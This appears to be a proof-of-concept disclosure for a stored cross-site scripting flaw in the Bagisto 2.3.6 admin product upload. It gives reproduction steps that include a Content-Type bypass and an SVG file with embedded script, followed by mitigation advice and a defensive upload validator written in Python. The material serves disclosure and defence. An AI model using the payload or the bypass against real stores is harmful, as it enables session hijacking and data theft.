
CVE-2025-60880 PoC — Webkul Software Bagisto Security Vulnerability

Source
Associated Vulnerability
Title: Webkul Software Bagisto Security Vulnerability (CVE-2025-60880)
Description: Webkul Software Bagisto is an open-source e-commerce framework from the Indian company Webkul Software. Bagisto version 2.3.6 contains a security vulnerability: a stored cross-site scripting flaw in the product creation path, which may lead to session hijacking, data theft, or unauthorized actions.
Description
CVE-2025-60880 - Stored Cross-Site Scripting (XSS) in Bagisto Admin Panel
Readme
# CVE-2025-60880: Stored Cross-Site Scripting (XSS) in Bagisto Admin Panel

An authenticated stored XSS vulnerability exists in the Bagisto 2.3.6 admin panel's product creation path, allowing an attacker to upload a crafted SVG file containing malicious JavaScript code. This vulnerability can be exploited by an authenticated admin user to execute arbitrary JavaScript in the browser, potentially leading to session hijacking, data theft, or unauthorized actions.

---

## Vulnerability Overview

* **CVE ID**: CVE-2025-60880
* **Type**: Cross-Site Scripting (XSS)
* **CVSS Score**: 6.9 (Medium)
* **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:N
* **Affected Vendor**: Bagisto
* **Affected Product**: Bagisto
* **Affected Version**: v2.3.6
* **Affected Component**: Bagisto Admin Panel (Product Creation Path)
* **Attack Vector**: Remote
* **Authentication**: Admin privileges required
* **Impact**: Code Execution, Session Hijacking, Data Theft

---

## Proof of Concept (PoC)

The vulnerability is exploited when an authenticated administrator uploads a crafted SVG file containing malicious JavaScript.

**Steps to Reproduce:**

1.  Log in to the Bagisto Admin Panel as an authenticated administrator.
2.  Navigate to the product creation path.
3.  Upload a crafted SVG file containing a JavaScript payload.
4.  The request is replayed after modifying the Content-Type header.
5.  The malicious SVG file is stored on the server.
6.  When the file's URL is accessed, the JavaScript executes in the user's browser.

**Example Malicious SVG Payload:**

```xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.domain);
   </script>
</svg>
```
---

## Recommendations

To mitigate this vulnerability, the following actions are recommended:

- Enforce input validation, content-type enforcement, and proper file handling.
- Restrict file uploads to trusted formats and sanitize SVG files to remove potentially harmful content.
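As an added example (not code from this PoC repository or from Bagisto), the Python below implements the two recommendations on the server side: it ignores the client-supplied Content-Type and identifies the file from its bytes, and it parses any SVG and rejects elements and attributes that can execute script. The function names and the sample SVG, modelled on the README payload, are my own constructions.

```python
import re
import xml.etree.ElementTree as ET

SVG_NS = "{http://www.w3.org/2000/svg}"
MAGIC = {b"\x89PNG\r\n\x1a\n": "image/png", b"\xff\xd8\xff": "image/jpeg",
         b"GIF87a": "image/gif", b"GIF89a": "image/gif"}
SCRIPTABLE_TAGS = {"script", "foreignobject", "iframe", "embed", "object"}
# Constructed sample modelled on the README payload: a <script> element inside an SVG.
POC_SVG = (b'<?xml version="1.0" standalone="no"?>\n'
           b'<svg version="1.1" xmlns="http://www.w3.org/2000/svg">'
           b'<polygon points="0,0 0,50 50,0"/><script>alert(document.domain);</script></svg>')

def sniff_type(data: bytes) -> str:
    """Identify the file kind from its bytes, ignoring the client's Content-Type."""
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    head = data.lstrip()[:64].lower()
    return "image/svg+xml" if head.startswith((b"<?xml", b"<svg")) else "application/octet-stream"

def svg_findings(data: bytes) -> list:
    """Reasons an SVG could run script when served inline; empty list means clean."""
    try:
        root = ET.fromstring(data)          # pyexpat does not fetch external DTDs by default
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    findings = [] if root.tag == SVG_NS + "svg" else [f"root is {root.tag}, not svg"]
    for el in root.iter():
        local = el.tag.rsplit("}", 1)[-1].lower()
        if local in SCRIPTABLE_TAGS:
            findings.append(f"<{local}> element")
        for name, value in el.attrib.items():
            attr = name.rsplit("}", 1)[-1].lower()    # strips the xlink namespace
            if attr.startswith("on"):
                findings.append(f"event handler attribute {attr}")
            elif attr == "href" and re.match(r"\s*(javascript|data)\s*:", value, re.I):
                findings.append(f"{attr} with {value.split(':')[0].strip().lower()}: scheme")
    return findings

def validate_upload(data: bytes, declared_type: str, allow_svg: bool = False):
    """Accept or reject an upload; returns (accepted, reason)."""
    actual = sniff_type(data)
    if actual != declared_type.split(";")[0].strip().lower():
        return False, f"declared {declared_type} but content is {actual}"
    if actual == "application/octet-stream" or (actual == "image/svg+xml" and not allow_svg):
        return False, f"{actual} uploads are not accepted"
    findings = svg_findings(data) if actual == "image/svg+xml" else []
    if findings:
        return False, "unsafe SVG: " + "; ".join(findings)
    return True, actual
```

Serving accepted SVGs with `Content-Disposition: attachment` or from a separate origin closes the remaining inline-rendering risk even when a check is bypassed.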

---
## Disclosure Timeline

| Date     | Action                           |
| -------- | -------------------------------- |
| 2025 AUG | Vulnerability Discovered         |
| 2025 AUG | Responsible Disclosure           |
| 2025 AUG | CVE ID Requested from MITRE      |
| 2025 OCT | CVE Assigned, Public Disclosure  |


---
## Disclaimer
The information and proof-of-concept (PoC) code provided in this repository are for educational and ethical research purposes only. The author is not responsible for any misuse or damage caused by the information or code provided herein. The user assumes all responsibility for their actions. It is the user's responsibility to ensure they are compliant with all applicable local, state, and federal laws.
File Snapshot

```text
[4.0K] /data/pocs/add48852d75dffe2aa45c957907131d61c4fb4ff
├── [1.0K] LICENSE
└── [2.9K] README.md

1 directory, 2 files
```